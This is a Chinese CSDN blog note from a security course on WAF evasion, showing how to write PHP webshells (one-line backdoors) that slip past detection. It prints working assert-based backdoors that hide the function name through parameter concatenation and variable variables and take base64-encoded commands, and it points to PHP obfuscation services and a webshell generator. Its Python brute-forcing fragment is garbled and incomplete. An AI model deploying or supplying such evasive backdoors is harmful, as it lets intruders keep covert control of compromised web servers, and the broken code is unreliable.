第七十七天WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参

于 2024-03-06 15:57:48 发布
阅读量494 收藏 7
点赞数 10
分类专栏: 网络安全全栈学习笔记 文章标签: 网络 网络安全 spring boot web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46343633/article/details/136481465
版权

第77天 WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参

知识点:

1、脚本后门基础&原理
2、脚本后门查杀绕过机制
3、权限维持覆盖&传参&加密&异或等
代码块&传参数据&工具指纹等(表面&行为)
1、代码表面层免杀-ASP&PHP&JSP&ASPX等
2、工具行为层免杀菜刀&蚁剑&冰蝎&哥斯拉等

章节点:

WAF绕过主要集中在信息收集,漏洞发现,漏洞利用,权限控制四个阶段

补充点:

1、什么是WAF?
Veb Application Firewall(web应用防火墙),一种公认的说法是"web应用防火墙通过执
行一系列针对HTTP/HTTPS的安全策路来专门为wb应用提供保护的一款产品。
基本可以分为以下4种
软件型WAF
以软件的形式安装在服务器上面,可以接触到服务器上的文件,因此就可以检测服务器上
是否有webshell,是否有文件被创建等。
硬件型WAF
以硬件形式部署在链路中,支持多种部暑方式。当串联到链路上时可以拦截恶意流重,在
旁路监听模式时只记录攻击但是不进行拦截。
云WAF
一股以反向代理的形式工作,通过配置后,使对网站的请求数据优先经过WAF主机,在
WAF主机对数据进行过滤后再传给服务器
网站内置的WAF
就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,
对输入的参数进行敏感词检测测啊什么的

在这里插入图片描述

演示案例:

基础-脚本后门控制原理代码解释
原理-脚本后门查杀机制-函数&行为
代码-脚本后门免杀变异-覆盖&传参
代码-脚本后门免杀变异-异或&加密
拓展脚本后门脚本类型-JSP&ASPX

基础脚本后门控制原理代码解释

对比工具代码菜刀&蚁剑&冰蝎&哥斯拉等

原理脚本后门查杀机制函数&行为

对比WAF规则数匹配&工具指纹等

代码脚本后门免杀变异夏盖&传参

1.php传参带入

<?php
$a=$_GET['a'];
$aa=$a.'ert';
$aa(base64_decode($_POST['X'])):
?>

?a=ass
x=cGhwaW5mbygpOw==

在这里插入图片描述

2.php变量覆盖

<?php
$a='b';
$b='assert';
$$a(base64_decode($_POST['x']));
?>

x=cGhwaw5mbygpow==

#代码脚本后门兔杀变异异或&加密
3.php加密变异
http://www.phpjm.net
https://www.phpjms.com/
http://1.15.155.76.1234/
思路:将webshell加密,上传过程中则不会被检测出,然后传参时使用参数加密绕过参数检测

4.php异或运算 无字符webshell
import requests
import time
import threading.queue
在这里插入图片描述

def string(
	while not q.empty()
		filename=q.get()
		url ='http://127.0.0.1:8081/x/+filename
		datas =
		'x':'phpinfo();'
		result requests.post(url,data=datas).content decode('utf-8')
		if 'XIAODI-PC'in result

拓展即本后门脚本类型JSP&ASPX

5.php脚本生成器
Webshell-venom
ASP PHP JSP ASPX

清歌secure
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第77WAF 攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参
weixin_71529930的博客
05-05 547
php在线加密平台: www.phpjm.net。但是还是检测不过,有post就检测不过。阿里云检测结果,因为是利用算法加密。猜测是旧版本的原因,升级新版本。把放在网站目录下,启动安全狗。案例三:免杀脚本生成代码。but过不了阿里云检测。正常写一个一句话木马。检测主要检测post。python代码免杀
看牛人怎么突破WAF防御(1)
weixin_33720452的博客
03-14 201
2019独角兽企业重金招聘Python工程师标准>>> ...
WAF攻防相关知识点总结2-代码免杀绕过
m0_66458291的博客
01-18 953
WAF的检测除了有对于非正常的流量检测外还对于非正常的数据包特征进行检测在宝塔的后台可以放置一句话木马的文件宝塔不会对于这个文件进行拦截,但是一旦我们使用菜刀蚁剑等webshell工具去进行连接的时候,数据报中有流量特征就会被拦截经过检测可以知道是waf对于数据报中的关键字进行了检测传参绕过:waf拦截使用的是正则表达式,匹配函数的关键字绕过思路就是把关键字的函数代码以参数值的形式进行发送一句话木门是 连接方式 ?a=asspost: x=base64e
01-WAF绕过信息收集
qq_56414082的博客
04-17 732
CC攻击可以归为DDoS攻击的一种,其原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。CC攻击主要模拟多个用户不停地进行访问那些需要大量数据操作的页面,造成服务器资源的浪费,使CPU长时间处于100%,永远都有处理不完的连接直至网络拥塞,令正常的访问被中止。同时,CC攻击的IP都是真实、分散的,并且都是正常的数据包,全都是有效且无法拒绝的请求。另外,因为CC攻击的目标是网页,所以服务器什么的都可以连接,ping也没问题,但是网页就是无法访问。
WAF攻防第七十七
B_l_a_nk的博客
07-07 223
1、脚本后门基础&原理 2、脚本后门查杀绕过机制 3、权限维持-覆盖&传参&加密&异或等 1、代码表面层免杀-ASP&PHP&JSP&ASPX等 2、工具行为层免杀-菜刀&蚁剑&冰蝎&哥斯拉等
Waf攻防-信息收集&漏洞发现&漏洞利用&权限控制
m0_65336233的博客
11-09 1419
简单的介绍了信息收集、漏洞发现、漏洞利用和权限控制waf绕过
第48WAF绕过-权限控制代码混淆及行为造轮子1
08-03
WAF 绕过-权限控制代码混淆及行为造轮子#Safedog 代码层手写及脚本绕过变量覆盖加密混淆,异或生成#BT Aliyun 代码层手写及脚本绕过编码解码
第80:红蓝对抗-AWD模式&准备&攻防&监控&批量1
08-03
- **WAF和批量脚本**:部署Web应用防火墙(Web Application Firewall, WAF)以保护服务,并准备批量操作脚本以提高效率。 3. **必备操作**: - **备份**:定期备份网站文件,以防万一。 - **密码修改**:更改...
管理系统系列--CDN & WAF集群管理系统。.zip
最新发布
02-25
管理系统系列--CDN & WAF集群管理系统。
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
可以绕waf的python脚本
04-19
.py文件 可以直接绕过主流waf 喜欢的小伙伴可以下载使用
ngx_waf:用于nginx的Web应用程序防火墙模块,无需进行复杂的配置。 &使用简单的nginx防火墙模块
03-17
ngx_waf English | 用于nginx的Web应用程序防火墙模块,无需进行复杂的配置。 功能 IPV4和IPV6支持。 Anti Challenge Collapsar,它可以自动阻止恶意IP。 特定IP地址上的例外允许。 阻止指定的IP地址。 阻止...
渗透测试-sqlmap绕过WAF脚本编写
lza20001103的博客
04-21 4447
渗透测试-sqlmap绕过WAF脚本编写
48:WAF绕过-权限控制代码混淆及行为造轮子
mingyqf的博客
05-07 239
本文为复现笔记,侵删 (https://www.cnblogs.com/zhengna/p/15133613.html) 文章目录思维导图**Safedog代码层手写及脚本绕过****BT Aliyun代码层手写及脚本绕过****ASP,PHP,ASPX,JSP,PY等后门免杀同理****案例1:Safedog-手写覆盖变量简易代码绕过-代码层****案例2:Safedog,BT,Aliyun-基于 覆盖变量 编码解码 绕过-代码层****案例3:Safedog-基于接口类加密混淆代码绕过-代码层****方
sqlmap --tamper 绕过WAF脚本分类整理
qq_50854662的博客
10-04 852
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格...
linux waf 脚本,利用 Naxsi 在 Nginx 上构建 WAF
weixin_28732953的博客
05-05 530
在「利用ModSecurity在Nginx上构建WAF」一文中,我们讲了如何以ModSecurity模块来部署一个WAF为其后端的Web应用提供安全防护。本文主要讲一下如何用另一个Nginx WAF模块Naxsi来构建一个可用的WAF。什么是NaxsiNaxsi是一个开放源代码、高效、低维护规则的Nginx Web应用防火墙模块,Naxsi的主要目标是帮助人们加固Web应用程序,以抵御SQL注入、...
WAF详解及WAF绕过
赤赤三的博客
03-20 8787
wafweb application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
waf绕过详解
热门推荐
zdy8023的博客
04-13 1万+
目录 waf防护原理讲解 目录扫描绕过waf 手工注入绕过waf sqlmap注入绕过waf 编写sqlmap绕过waf脚本 过waf一句话编写讲解 菜刀连接绕过waf webshell上传绕过waf 提权绕过waf waf绕过原理详解 了解waf防护原理 查看waf防护位置 熟悉防护规则 了解防护机制 查看拦截时间阀值 我们可以下载一个安全狗,查看它详细的防护机制,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值